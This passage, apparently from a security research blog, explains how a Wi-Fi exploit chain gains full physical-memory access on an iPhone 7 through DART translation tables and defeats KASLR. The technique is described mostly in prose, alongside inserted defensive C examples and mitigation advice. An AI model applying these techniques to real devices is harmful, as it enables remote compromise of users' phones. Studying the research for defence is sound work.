In order to successfully carry out such an attack, we must first figure out whether DART’s translation tables indeed constitute valid targets for the vulnerability primitive. Namely, we must figure out whether they reside within the primitive’s scope of influence.

However, scanning through the memory ranges within the primitive’s scope, we quickly come to the realisation that the placement of objects following the message rings is highly variable. Indeed, each device reboot yields an entirely different layout, thus preventing us from relying on any particular object being placed at any given offset from a message ring.

Perhaps we’re out of luck…?

Shaping IO-Space

...Instead of relying on the lucky placement of nearby objects, let’s take matters into our own hands.

In order to place a DART translation table within the primitive’s scope, we’d need to either move a translation table into the primitive’s scope, or to move one of the message rings, thus shifting the primitive’s scope across different regions of the kernel’s memory.

The former approach seems infeasible; DART’s translation tables are only allocated when the IO-Space mappings are first populated (namely, when the Wi-Fi chip is first initialised). Once the mapping is complete, all of DART’s translation tables remain in their fixed positions within the kernel’s VAS.

But what about moving the rings? While control rings are immovable, a second set of rings exists -- “flow rings”. Flow rings are H2D rings used to facilitate the transfer of outgoing (TX) traffic. They do not carry the traffic itself, but rather notify the device of the transmitted frame’s metadata (including the IO-Space address at which its actual content is stored).

Unlike control rings, flow rings are far more “flexible”. Individual flows are dynamically added and removed as the need arises, by sending a corresponding control message from the host to the device. Each flow is identified by its endpoints (source and destination MAC), their encompassed protocol (i.e., EtherType), and their “priority”.

Perhaps we can use this dynamic nature of flow rings to our advantage. For example, if we were to delete a flow ring, it might subsequently get re-allocated at a different location in the kernel’s memory, thus shifting the scope of our OOB primitive to a possibly more “interesting” patch of objects.

Normally, deleting a flow ring is a two-way process; the host sends a deletion request, which is subsequently met by a corresponding message from the device, signalling a successful deletion. However, inspecting the host’s implementation of the above messages, it appears we can just as well skip the first half of the exchange, and send an unsolicited deletion response from the device:

uint32_t AppleBCMWLANBusPCIeInterface::completeFlowRingDeleteResponseMsg(
        uint64_t unused, struct tx_flowring_delete_response_t* msg) {
    //Is the ring ID within bounds?
    if (msg->flow_ring_id < this->min_flow ||
        msg->flow_ring_id >= this->max_flow) {
        ...
    }
    //Does a flow ring exist at the given index?
    else if (this->flow_rings[msg->flow_ring_id]) {
        this->deleteFlowCallback(msg->status, msg->flow_ring_id);
        ...
        return 0;
    }
    else {
        ...
        return 0xE00002BC;
    }
}
function 0xFFFFFFF006D2FD44

Doing so causes an interesting side-effect to occur: instead of completely deleting the ring, the host decrements a single reference count on the ring object, which is insufficient to bring down the total count to zero (the missing release was meant to be performed by the code responsible for sending the deletion request in the first place).

Consequently, the flow ring is left mapped into IO-Space, but is unusable by the host. As such, newly allocated flow rings cannot inhabit the same IO-Space range (as it remains occupied by the unusable ring), and must instead be carved from higher IO-Space addresses.

This primitive has several interesting side-effects.

For starters, it allows us to re-allocate flow rings, thus moving around their base addresses within the kernel’s VAS, recasting the net over potentially interesting objects within the kernel.

More importantly, however, this primitive allows us to force the allocation of a brand new DART L2 translation table. Since each L2 translation table can only map a fixed range into IO-Space, by continuously leaking flow rings we are able to exhaust the available space in the L2 table, thereby forcing DART to allocate a new table from which the next IO-Space addresses are carved.

Lastly, as luck would have it, since both the rings themselves and DART’s translation tables are carved using the same allocator (IOMalloc), and have similar sizes, they are both carved from the same “zone” of memory. Therefore, by continuously leaking IO-Space addresses and creating new flow rings until a new DART L2 translation table is formed, we can guarantee that the new table will be placed in close proximity to the following flow ring, thereby placing the L2 translation table within our primitive’s scope!

Putting it all together, we can finally reach a reliable placement of DART translation tables in close proximity to a flow ring, thereby allowing us to overwrite entries in the translation tables with flow ring items.

Flow Ring Items vs. DART Descriptors

To understand whether flow ring items make good candidates to overwrite DART descriptors, let’s take a moment to inspect their structure. As these items are present in the same form in the Android driver, we are spared the need to reverse-engineer them:

So how does the above structure relate to a DART descriptor?

As the above structure has a 64-bit aligned size, and ring items are always placed in increments of the same size, we can deduce that each quadword in the above structure will reside at a 64-bit aligned address. Similarly, DART descriptors are 64 bits wide, and are placed at 64-bit aligned addresses. Therefore, each aligned quadword in the above structure serves as a potential candidate for replacing a DART descriptor.

However, going over the above quadwords, it is quickly apparent that no fully-controlled word exists within the structure. Indeed, the first and last word are composed of mostly constant values, whereas the third and fourth contain IO-Space addresses (whose forms are incompatible with DART descriptors). Nonetheless, taking a closer look, it appears that the second word is at least somewhat malleable. Its lower six bytes are governed by the destination MAC address to which the frame is being transmitted, while the two upper bytes contain the beginning of our source MAC.

Assuming we could cause the host to send frames to a MAC address of our choosing, that would grant us control over the lower six bytes. However, the remaining two bytes are populated using our device’s MAC address, a much harder target for modification...

Spoofing The Source MAC?

To understand whether we can indeed modify the device’s MAC address, let’s take a closer look at the mechanisms through which the MAC address may be programmable on the Wi-Fi chip.

Like many production devices, Broadcom’s Wi-Fi chips allow the storage of chip-specific configuration using one of two mechanisms: either a block of Serial Programmable ROM (SPROM), or a set of One Time Programmable (OTP) fuses. The Wi-Fi chip present on the iPhone 7 uses the latter mechanism.

As for the host, it stores the Wi-Fi chip’s MAC address in the “device tree” (among many other device-specific properties). The “device tree” is a simple hierarchical representation of hardware components utilised by the platform (much like its Linux counterpart, bearing the same name), allowing consumers within the kernel to easily access (and populate) its nodes.

During the Wi-Fi chip’s initialisation, the AppleBCMWLANCore driver retrieves the contents of the chip’s OTP fuses (using the PCIe BARs), and proceeds to parse them according to the PCMCIA Card Information Structure (CIS) format. Reverse-engineering the parsing functions in the kernel, it is quickly apparent that one tag in particular bears significance with regards to our pursuits.

If a “Function Extension” tag is encountered in the CIS data embedded in the OTP, the kernel will extract the MAC address encapsulated within it, and insert it into the “local-mac-address” node in the device tree, representing the Wi-Fi MAC address!

Extracting the stored OTP contents from the kernel, we can see that no such element is present in the OTP contents to begin with, thus allowing us to insert our own tag without fear of causing a collision:

Wi-Fi Chip OTP

Therefore, to change the MAC address, all we’d need to do is fuse the corresponding bits into the OTP, thus inserting the new CIS tag. However, this is easier said than done. For starters, writing to the OTP is a risky operation, and may result in permanent damage to the chip if done incorrectly. Moreover, as its name implies, writing to the OTP is a one-time operation, leaving no room for error. Perhaps we could avoid changing the MAC after all?

After discussing the above situation, my colleague Ian Beer suggested an alternative!

Why not, instead, check if the high-order bits in the DART descriptor are actually being used for the translation process? To test this suggestion, we’ll use the research platform to insert a valid L2 descriptor into DART, with one small caveat -- we’ll change the two upper bytes in the 64-bit descriptor to “corrupted” values. After inserting the mapping, we can simply insert a DMA hook into the firmware, performing a DMA access to the aforementioned address.

Running the experiment above we are greeted with a positive result! Indeed, the upper bytes of the DART descriptor are ignored by the translation process, thus sparing us the need to modify the MAC.

Spoofing The Destination MAC

Having confirmed that modifying the source MAC is no longer a barrier, all that remains is to cause the host to send a frame to a crafted MAC address, thus allowing us to control the six significant bytes within our 64-bit word.

Naturally, one way to solicit a response from the host is to transmit an ICMP Echo Request (ping) to it, subsequently triggering a corresponding ICMP Echo Response to be sent in response. While this approach can easily trigger the transmission of frames from the host, it only allows frames to be transmitted to known destinations, but does not offer control over the destination MAC.

To trigger communications to our target MAC, we’ll first launch an ARP Spoofing attack: sending a crafted ping from an arbitrary (unused) IP address causes the host to send an “ARP Request” querying the MAC address of the crafted IP, to which we’ll send a response encoding our own MAC address, thus associating the IP address with a crafted MAC value.

However, several problems arise when using this method. First, recall that the MAC address is meant to masquerade as a valid DART L2 Descriptor. As we’ve seen in our analysis of the descriptor formats, every valid L2 descriptor must have the two least-significant bits set. This poses somewhat of a problem for MAC addresses, as their bottom bits bear special significance:

Setting the bottom two bits in the MAC address would indicate that it is a broadcast / multicast address. As we are sending unicast traffic (and are expecting a unicast response), it might be difficult to solicit such responses from the host. Furthermore, any network-resident security devices might inspect the traffic and flag it as suspicious (especially as we are executing a classical ARP spoofing attack). What’s more, the router or access point may refuse to route unicast traffic to a broadcast MAC.

To get around the above limitations, we’ll simply inject the traffic directly from the firmware, without transmitting it over the air. To achieve this goal, we’ve written a small assembly stub that, when executed on the firmware, injects the encapsulated frames directly into the host, as if it were transmitted over the network.

This allows us to inject even potentially malformed traffic that would not have been routable (like unicast traffic from a broadcast MAC). Indeed, after running the ARP spoofing vector with the above mechanism, we are able to solicit responses from the host to our crafted (broadcast) MAC address (XNU does not object to sending unicast traffic to broadcast MACs). Great!
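The inspection the post alludes to above (a network-resident device flagging the ARP exchange) looks roughly like the following, as an added example that is not part of the original post. It judges each ARP reply on three points: a sender MAC with the I/G (group) bit set, a mismatch between the ARP sender MAC and the Ethernet source MAC, and a change in an IP-to-MAC binding the table has already seen. The frames it inspects are constructed inside the block; the table size and flag values are choices of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Flags returned by arp_inspect(); they combine. */
enum {
    ARP_OK              = 0,
    ARP_MALFORMED       = 1,   /* not an Ethernet ARP reply of the expected size */
    ARP_GROUP_SENDER    = 2,   /* sender MAC has the I/G (group) bit set */
    ARP_SENDER_MISMATCH = 4,   /* ARP sender MAC differs from Ethernet source MAC */
    ARP_BINDING_CHANGED = 8    /* IP previously seen bound to a different MAC */
};

#define ARP_TABLE_MAX 16
struct arp_binding { uint8_t ip[4]; uint8_t mac[6]; int used; };
struct arp_table   { struct arp_binding e[ARP_TABLE_MAX]; };

#define ETH_HDR_LEN   14
#define ARP_LEN       28
#define ARP_FRAME_LEN (ETH_HDR_LEN + ARP_LEN)

/* Builds a constructed, untagged Ethernet+ARP reply frame for the tests below.
 * Returns the frame length. */
size_t make_arp_reply(uint8_t *f, const uint8_t eth_src[6], const uint8_t sha[6],
                      const uint8_t spa[4], const uint8_t tha[6], const uint8_t tpa[4])
{
    memset(f, 0, ARP_FRAME_LEN);
    memcpy(f, tha, 6); memcpy(f + 6, eth_src, 6);      /* Ethernet dst, src */
    f[12] = 0x08; f[13] = 0x06;                         /* EtherType ARP */
    uint8_t *a = f + ETH_HDR_LEN;
    a[0] = 0; a[1] = 1;                                 /* htype = Ethernet */
    a[2] = 0x08; a[3] = 0x00;                           /* ptype = IPv4 */
    a[4] = 6; a[5] = 4;                                 /* hlen, plen */
    a[6] = 0; a[7] = 2;                                 /* oper = reply */
    memcpy(a + 8, sha, 6);  memcpy(a + 14, spa, 4);
    memcpy(a + 18, tha, 6); memcpy(a + 24, tpa, 4);
    return ARP_FRAME_LEN;
}

/* Inspects one frame and returns a bitmask of the flags above. Only clean
 * replies are recorded, so a later reply that rebinds the same IP is noticed. */
int arp_inspect(struct arp_table *t, const uint8_t *f, size_t len)
{
    if (len < ARP_FRAME_LEN || f[12] != 0x08 || f[13] != 0x06)
        return ARP_MALFORMED;
    const uint8_t *a = f + ETH_HDR_LEN;
    if (a[4] != 6 || a[5] != 4 || a[6] != 0 || a[7] != 2)
        return ARP_MALFORMED;                           /* only IPv4-over-Ethernet replies are judged */
    const uint8_t *sha = a + 8, *spa = a + 14;
    int flags = ARP_OK;
    if (sha[0] & 0x01)                                  /* I/G bit: a group address cannot be a real sender */
        flags |= ARP_GROUP_SENDER;
    if (memcmp(sha, f + 6, 6) != 0)                     /* ARP body disagrees with the Ethernet header */
        flags |= ARP_SENDER_MISMATCH;

    struct arp_binding *match = NULL, *free_slot = NULL;
    for (int i = 0; i < ARP_TABLE_MAX; i++) {
        if (t->e[i].used) {
            if (memcmp(t->e[i].ip, spa, 4) == 0) { match = &t->e[i]; break; }
        } else if (!free_slot) {
            free_slot = &t->e[i];
        }
    }
    if (match) {
        if (memcmp(match->mac, sha, 6) != 0)
            flags |= ARP_BINDING_CHANGED;
    } else if (flags == ARP_OK && free_slot) {
        memcpy(free_slot->ip, spa, 4);
        memcpy(free_slot->mac, sha, 6);
        free_slot->used = 1;
    }
    return flags;
}

int main(void)
{
    /* Constructed sample: a clean reply, then a rebind of the same IP. */
    struct arp_table t; memset(&t, 0, sizeof t);
    uint8_t f[ARP_FRAME_LEN];
    const uint8_t host[6]  = {0x02,0,0,0,0,0x10}, host_ip[4] = {192,0,2,1};
    const uint8_t a_mac[6] = {0x02,0,0,0,0,0x01}, a_ip[4]    = {192,0,2,10};
    const uint8_t b_mac[6] = {0x02,0,0,0,0,0x02};
    size_t n = make_arp_reply(f, a_mac, a_mac, a_ip, host, host_ip);
    printf("first reply  -> flags %d\n", arp_inspect(&t, f, n));
    n = make_arp_reply(f, b_mac, b_mac, a_ip, host, host_ip);
    printf("second reply -> flags %d\n", arp_inspect(&t, f, n));
    return 0;
}
```

A binding-change alert on its own is noisy on networks with DHCP churn; the value of the check lies in correlating it with the other two flags and with the reply being unsolicited, which is the property the post exploits.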


Finally, all the ducks are lined up in a row -- we can solicit traffic to MAC addresses of our choosing (even broadcast MACs), without having to modify the source MAC. Furthermore, we can shape IO-Space in order to force a new DART translation table to be allocated following a flow ring within the kernel’s VAS. Therefore, we can overwrite DART descriptors with our own crafted values, thus introducing new mappings into IO-Space. However, a single question remains -- which physical address should we map into IO-Space?

After all, we still haven’t dealt with the issue of KASLR. As the kernel’s loading addresses, both physical and virtual, are “slid” using a randomised value, we cannot locate physical addresses within the kernel until we uncover the slide’s value. If we cannot reliably locate the kernel’s base address, which physical addresses can we find?

To get around this limitation, we’ll use one more trick! While the host’s physical address space houses the DRAM, in which the kernel and application memory are stored, additional regions of physically addressable content can also be found in the PAS. For instance, hardware registers are mapped into fixed physical addresses, allowing the host to interact with peripherals on the SoC. Among these peripherals is DART itself!

As we’ve previously seen, DART’s translation process is initiated using four “L0 descriptors”. These descriptors are fed into DART’s hardware registers, denoting the base addresses of the translation tables from which the IO-Space translation process begins. If we were able to map DART’s hardware registers into IO-Space, we could read the descriptors, thus allowing us to locate DART’s translation tables within the physical address space!

It should be noted that although DART’s hardware registers are addressable within the host’s physical address space, it remains unknown why IO-Space mappings should even be allowed to include ranges beyond the DRAM’s bounds. Indeed, it stands to reason that such mappings would be prohibited by the hardware. However, as it happens, no such restriction is enforced - DART freely allows any physical range to be inserted into IO-Space.

Therefore, if we wish to map-in DART’s own hardware registers into IO-Space, all that remains is to locate the physical ranges corresponding to DART’s hardware registers! To do so, we’ll use a combined approach.

First, we’ll use our research platform to extract the DART instance, from which we can subsequently retrieve the kernel VAS pointer corresponding to DART’s hardware registers. Then, using our translation table module, we can proceed to convert the kernel virtual address to its matching physical range. After doing so, we are presented with the following result:

Great! The address is clearly not within the DRAM’s range, hinting that we’re on the right track.

To verify whether this is indeed the correct address, we’ll use a second approach. As we already noted, the device hierarchy is stored within a structure called the “device tree”. Different properties relating to each peripheral, including the addresses of their corresponding hardware registers, are stored as nodes within this tree.

The device tree itself is present in a binary format within the firmware image (encapsulated in an IMG4 container). After extracting the device tree, we are presented with a blob storing the device hierarchy. Although the tree’s format is undocumented, inspecting the binary reveals an extremely simple structure; a fixed header denoting the number of children and entries contained in each node, followed by a fixed-length name, and a variable-length value. I later discovered that Jonathan Levin has similarly reversed this structure, and has written a tool to parse out its contents (albeit for an IMG3 container) -- you can check out his script here.
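The structure just described can be walked with very little code. The following C parser is an added example, not the post's own script or Jonathan Levin's tool. Its layout assumptions (two little-endian 32-bit counts per node, a 32-byte NUL-padded property name, a 32-bit length whose top bit is masked as a flag, values padded to 4 bytes, children following the properties) match the public parsers of this format but should be treated as assumptions here; the blob it parses is constructed inline, and the register base it returns is a placeholder value, not a real address.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DT_NAME_LEN 32u     /* assumed fixed-length property name field */

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

struct dt_prop { const uint8_t *value; uint32_t len; };

/* Recursive walk. Returns 1 and fills *out when a node whose "name" property
 * equals node_name carries prop_name, 0 if not found, -1 if the blob is
 * truncated (every length is checked before it is trusted). */
static int dt_walk(const uint8_t *blob, size_t size, size_t *off,
                   const char *node_name, const char *prop_name, struct dt_prop *out)
{
    if (*off > size || size - *off < 8) return -1;
    uint32_t nprops = rd32(blob + *off), nchildren = rd32(blob + *off + 4);
    *off += 8;
    int name_matches = 0;
    struct dt_prop cand = { NULL, 0 };
    for (uint32_t i = 0; i < nprops; i++) {
        if (size - *off < DT_NAME_LEN + 4) return -1;
        const char *pname = (const char *)(blob + *off);
        uint32_t plen = rd32(blob + *off + DT_NAME_LEN) & 0x7fffffffu;   /* top bit assumed to be a flag */
        size_t padded = ((size_t)plen + 3) & ~(size_t)3;
        const uint8_t *pval = blob + *off + DT_NAME_LEN + 4;
        if (size - (*off + DT_NAME_LEN + 4) < padded) return -1;
        if (strncmp(pname, "name", DT_NAME_LEN) == 0 &&
            plen == strlen(node_name) + 1 && memcmp(pval, node_name, plen) == 0)
            name_matches = 1;
        if (strncmp(pname, prop_name, DT_NAME_LEN) == 0) { cand.value = pval; cand.len = plen; }
        *off += DT_NAME_LEN + 4 + padded;
    }
    if (name_matches && cand.value) { *out = cand; return 1; }
    for (uint32_t i = 0; i < nchildren; i++) {
        int rc = dt_walk(blob, size, off, node_name, prop_name, out);
        if (rc != 0) return rc;
    }
    return 0;
}

/* Length of prop_name under the first node named node_name, with *value
 * pointing into the blob; 0 if absent, -1 if the blob is malformed. */
long dt_find_prop(const uint8_t *blob, size_t size, const char *node_name,
                  const char *prop_name, const uint8_t **value)
{
    size_t off = 0;
    struct dt_prop p = { NULL, 0 };
    int rc = dt_walk(blob, size, &off, node_name, prop_name, &p);
    if (rc < 0) return -1;
    if (rc == 0) return 0;
    *value = p.value;
    return (long)p.len;
}

/* --- constructed sample blob (not extracted from any device) --- */
static size_t put_u32(uint8_t *b, size_t off, uint32_t v)
{
    b[off] = (uint8_t)v;             b[off + 1] = (uint8_t)(v >> 8);
    b[off + 2] = (uint8_t)(v >> 16); b[off + 3] = (uint8_t)(v >> 24);
    return off + 4;
}

static size_t put_prop(uint8_t *b, size_t off, const char *name, const void *val, uint32_t len)
{
    memset(b + off, 0, DT_NAME_LEN);
    strncpy((char *)b + off, name, DT_NAME_LEN - 1);
    off = put_u32(b, off + DT_NAME_LEN, len);
    memcpy(b + off, val, len);
    size_t padded = ((size_t)len + 3) & ~(size_t)3;
    memset(b + off + len, 0, padded - len);
    return off + padded;
}

/* Root node with one child named "dart-wifi" whose "reg" holds a PLACEHOLDER
 * base/size pair. Needs a 256-byte buffer; returns the blob length (164). */
size_t build_sample_tree(uint8_t *b)
{
    const uint64_t reg[2] = { 0x12340000ull, 0x4000ull };   /* placeholder, not a real register range */
    size_t off = 0;
    off = put_u32(b, off, 1); off = put_u32(b, off, 1);        /* root: 1 property, 1 child */
    off = put_prop(b, off, "name", "device-tree", 12);
    off = put_u32(b, off, 2); off = put_u32(b, off, 0);        /* child: 2 properties, no children */
    off = put_prop(b, off, "name", "dart-wifi", 10);
    off = put_prop(b, off, "reg", reg, sizeof reg);
    return off;
}

/* Looks up the sample's "reg" base the way a register-address lookup would. */
uint64_t sample_reg_base(void)
{
    uint8_t blob[256];
    size_t n = build_sample_tree(blob);
    const uint8_t *v = NULL;
    if (dt_find_prop(blob, n, "dart-wifi", "reg", &v) < 8) return 0;
    uint64_t base;
    memcpy(&base, v, sizeof base);                           /* same byte order as the builder */
    return base;
}

int main(void)
{
    printf("dart-wifi reg base = 0x%llx\n", (unsigned long long)sample_reg_base());
    return 0;
}
```

On a real blob the interesting part is the truncation handling: every property length comes from the image, so a parser that trusts it without comparing against the remaining size will read past the buffer on a crafted or damaged tree.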

Regardless, after writing our own Python script to parse the device tree, we are presented with the following result:

Ah-ha! We once again find the same physical address, thus concluding that our analysis of DART’s hardware registers is correct.

Putting it all together, we can now utilise our exploit primitive to map the physical address containing DART’s registers into IO-Space. Once mapped, we can proceed to read the hardware registers’ values, including the L0 descriptors. It should be noted that attempting to access the hardware registers from the host requires strict 32-bit load and store operations -- attempting a 64-bit load from the hardware registers results in a garbled value being returned. Curiously, however, DMA-ing to and from the hardware registers from the Wi-Fi chip goes unhindered!

Using the L0 descriptor, we can now extract the physical address of the next translation table in DART’s hierarchy. Then, by repeating the exploit primitive and mapping-in the newly discovered physical address into IO-Space, we can repeat the process, descending down DART’s translation hierarchy until we reach a DART L2 translation table. Thus, using one flow ring, we can bring them all, and in IO-Space bind them.

Once an L2 translation table is located within the physical address space, we can proceed to map it into IO-Space using our exploit primitive one last time, thus inserting DART’s own translation table into IO-Space!

By mapping DART’s translation table into its own IO-Space ranges, we can now utilise DMA access from the Wi-Fi chip in order to freely introduce new mappings into IO-Space (removing the need for the exploit primitive), thus gaining full control over the host’s physical memory!

Furthermore, as DART’s translation entries are never cleared, we are guaranteed that once the malicious IO-Space entries are inserted, they remain accessible to the Wi-Fi chip, until the device itself reboots. As such, the exploit process need only occur once in order to introduce a backdoor allowing the Wi-Fi chip to freely access the host’s physical memory.

One curiosity of note is that DART has a rather large TLB. Therefore, changes in IO-Space may not be reflected immediately, until the entries are evicted from the cache. Nonetheless, this is easily dealt with by mapping in IO-Space addresses in a circular pattern, thus allowing stale entries to get cleared.

Finding The KASLR Slide

At long last, we have complete control over the entire physical address space, directly from the Wi-Fi chip. Consequently, we can proceed to map and modify any physical address we desire, even those corresponding to the kernel’s data structures.

While this form of access is sufficient in order to subvert the kernel, there’s one tiny snag we have yet to deal with: KASLR. Since the kernel’s physical base address is randomised using the KASLR slide, and we have yet to deduce its value, we might have to resort to scanning the DRAM’s physical address ranges until we locate the kernel itself.

This approach is rather inefficient. Instead, we can opt for a more elegant path. Recall that, as we’ve just seen, hardware registers may be freely mapped into IO-Space. As hardware registers are not affected by the KASLR slide (indeed they are mapped at fixed physical addresses), they can be trivially located regardless of the current “slide” value.

Perhaps one of the hardware registers can be used as an oracle to deduce the KASLR slide?

Recall that newer devices, such as the iPhone 7, enforce the integrity of the kernel using a hardware mechanism dubbed “KTRR”. Simply put, this mechanism allows the device to provide “lockdown” regions, to which subsequent modifications are prohibited. These regions are programmed using a special set of hardware registers.

Amusingly, this very same mechanism can be used to deduce the KASLR slide!

By mapping in physical addresses corresponding to the aforementioned hardware registers, we can proceed to read their contents directly from IO-Space. This, in turn, reveals the physical ranges encoded in the “lockdown registers”, which store none other than the kernel’s base address.

The Exploit

Summing up all of the above, we’ve finally written an exploit, allowing full control over the device’s physical memory over-the-air, using Wi-Fi communication alone. You can find the exploit here.

It should be noted that several smaller details have been omitted from the blog post, in the interest of (some) brevity. For instance, locating the offset between the newly allocated DART translation table and the flow ring requires a process of probing various IO-Space addresses, while also guaranteeing that alignment constraints enforced by the granularity of ring item sizes are met. We encourage researchers to read the exploit’s code in order to discover any such omitted parts.

The exploit has been tested against the iPhone 7 running iOS 10.2 (14C92). The vulnerabilities are present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the symbols used by the exploit.

Upon successful execution, the exploit exposes APIs to read and write the host’s physical memory directly over-the-air, by mapping in any requested address to the controlled DART L2 translation table, and issuing DMA accesses to the corresponding mapped IO-Space addresses.

For convenience’s sake, the exploit also locates the kernel’s physical base address using the method we described above (using the KTRR read-only region registers), thus allowing researchers to easily explore the kernel’s physical memory ranges.

Over the course of this series of blog posts, we’ve explored the security of the Wi-Fi stack on Apple devices. Consequently, we constructed a complete exploit chain, allowing attackers to reliably gain control over the iOS kernel on an iPhone 7 using Wi-Fi communication alone.

During our research, we explored several components, including Broadcom’s Wi-Fi firmware, the DART IOMMU, and Apple’s Wi-Fi drivers. Each of the aforementioned components is proprietary, thus requiring substantial effort to gain visibility into their operations. We hope that by providing the tools used to conduct our research, additional exploration of these surfaces will be performed in the future, allowing for their corresponding security postures to be enhanced.

We’ve also seen how the iPhone utilises hardware security mechanisms, such as DART, in order to provide isolation between the host and potentially malicious components. These mechanisms significantly raise the bar for launching successful attacks targeting the host. Nonetheless, additional research into DART is needed in order to explore all facets of its implementation. For instance, while we’ve explored the enacted IO-Space through the prism of the Wi-Fi chip, additional PCIe components exist on the SoC, which are similarly guarded by DARTs. These components remain, as of yet, unexplored.

Apart from fixing individual vulnerabilities in the security boundaries between the host and the Wi-Fi chip, several structural enhancements can be applied to make future exploitation harder. This includes introducing read-only mappings to DART (if they are not already present), clearing unused descriptors from DART’s translation tables upon rebooting the associated component, and preventing IO-Space mappings from exposing physical ranges beyond the DRAM.
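As an added example (not DART's real interface, whose internals the post only partly reverse-engineers), the following C model shows what enforcing those three measures looks like for one L2 table: mappings are confined to DRAM, so a request to expose MMIO such as DART's own registers is refused; a caller can ask for a read-only mapping; live descriptors are never silently replaced; and a component reset wipes the table. The page size, table size and the read-only bit are assumptions of the model; the two low valid bits follow the post's description of L2 descriptors, and the DRAM range in the sample is constructed.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical model of one DART L2 translation table and a mapping policy.
 * Constants marked "assumed" are model choices, not documented DART facts. */
#define DART_PAGE_SHIFT  12u                        /* assumed translation granule */
#define DART_PAGE_SIZE   (1ull << DART_PAGE_SHIFT)
#define DART_L2_ENTRIES  512u                       /* assumed table size */
#define DART_DESC_VALID  0x3ull   /* the post observes valid L2 descriptors carry both low bits */
#define DART_DESC_RO     0x4ull   /* hypothetical read-only flag for the model */
#define DART_DESC_ADDR   (~0ull << DART_PAGE_SHIFT)

struct dart_l2     { uint64_t desc[DART_L2_ENTRIES]; };
struct dart_policy { uint64_t dram_base, dram_size; };   /* the only physical range IO-Space may expose */

enum { DART_OK = 0, DART_E_RANGE = -1, DART_E_ALIGN = -2, DART_E_BUSY = -3, DART_E_PHYS = -4 };

/* Map npages pages starting at physical address phys into slots
 * [first, first + npages). Rejects ranges outside DRAM, unaligned addresses,
 * and overwrites of live descriptors. */
int dart_map(struct dart_l2 *t, const struct dart_policy *p, uint32_t first,
             uint32_t npages, uint64_t phys, int writable)
{
    if (npages == 0 || first >= DART_L2_ENTRIES || npages > DART_L2_ENTRIES - first)
        return DART_E_RANGE;
    if (phys & (DART_PAGE_SIZE - 1))
        return DART_E_ALIGN;
    uint64_t bytes = (uint64_t)npages << DART_PAGE_SHIFT;
    uint64_t rel = phys - p->dram_base;
    if (phys < p->dram_base || rel >= p->dram_size || bytes > p->dram_size - rel)
        return DART_E_PHYS;                          /* beyond DRAM: MMIO, including DART's own registers */
    for (uint32_t i = 0; i < npages; i++)
        if (t->desc[first + i] & DART_DESC_VALID)
            return DART_E_BUSY;                      /* never silently replace a live mapping */
    for (uint32_t i = 0; i < npages; i++)
        t->desc[first + i] = ((phys + ((uint64_t)i << DART_PAGE_SHIFT)) & DART_DESC_ADDR)
                           | DART_DESC_VALID | (writable ? 0 : DART_DESC_RO);
    return DART_OK;
}

/* Clear a range once its owner is done with it, so stale entries never linger. */
int dart_unmap(struct dart_l2 *t, uint32_t first, uint32_t npages)
{
    if (npages == 0 || first >= DART_L2_ENTRIES || npages > DART_L2_ENTRIES - first)
        return DART_E_RANGE;
    memset(&t->desc[first], 0, (size_t)npages * sizeof t->desc[0]);
    return DART_OK;
}

/* Called when the associated component (here, the Wi-Fi chip) is reset: drop
 * every descriptor so mappings cannot survive a reboot of the device. */
void dart_reset(struct dart_l2 *t) { memset(t, 0, sizeof *t); }

unsigned dart_live_count(const struct dart_l2 *t)
{
    unsigned n = 0;
    for (uint32_t i = 0; i < DART_L2_ENTRIES; i++)
        if ((t->desc[i] & DART_DESC_VALID) == DART_DESC_VALID) n++;
    return n;
}

int dart_desc_writable(uint64_t d)
{
    return (d & DART_DESC_VALID) == DART_DESC_VALID && !(d & DART_DESC_RO);
}

uint64_t dart_desc_phys(uint64_t d) { return d & DART_DESC_ADDR; }

int main(void)
{
    /* Constructed platform: 2 GiB of DRAM at 0x800000000; registers live elsewhere. */
    struct dart_l2 t; memset(&t, 0, sizeof t);
    struct dart_policy p = { 0x800000000ull, 0x80000000ull };
    printf("map DRAM page      -> %d\n", dart_map(&t, &p, 0, 1, 0x800001000ull, 1));
    printf("map MMIO page      -> %d\n", dart_map(&t, &p, 1, 1, 0x2000ull, 1));
    printf("re-map live slot   -> %d\n", dart_map(&t, &p, 0, 1, 0x800002000ull, 1));
    return 0;
}
```

The DRAM check is the one that would have stopped the post's register-mapping step outright; the busy check and the reset turn the "overwrite a descriptor, keep it forever" pattern into a detectable failure rather than a silent backdoor.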

Lastly, while memory isolation goes a long way towards defending the host against a rogue Wi-Fi chip, the host must still consider all communications originating from the Wi-Fi chip as potentially malicious. To this end, the numerous communication channels between the two endpoints (including event packets, “ioctls”, and control commands), must be designed to withstand malformed data transmitted by the chip.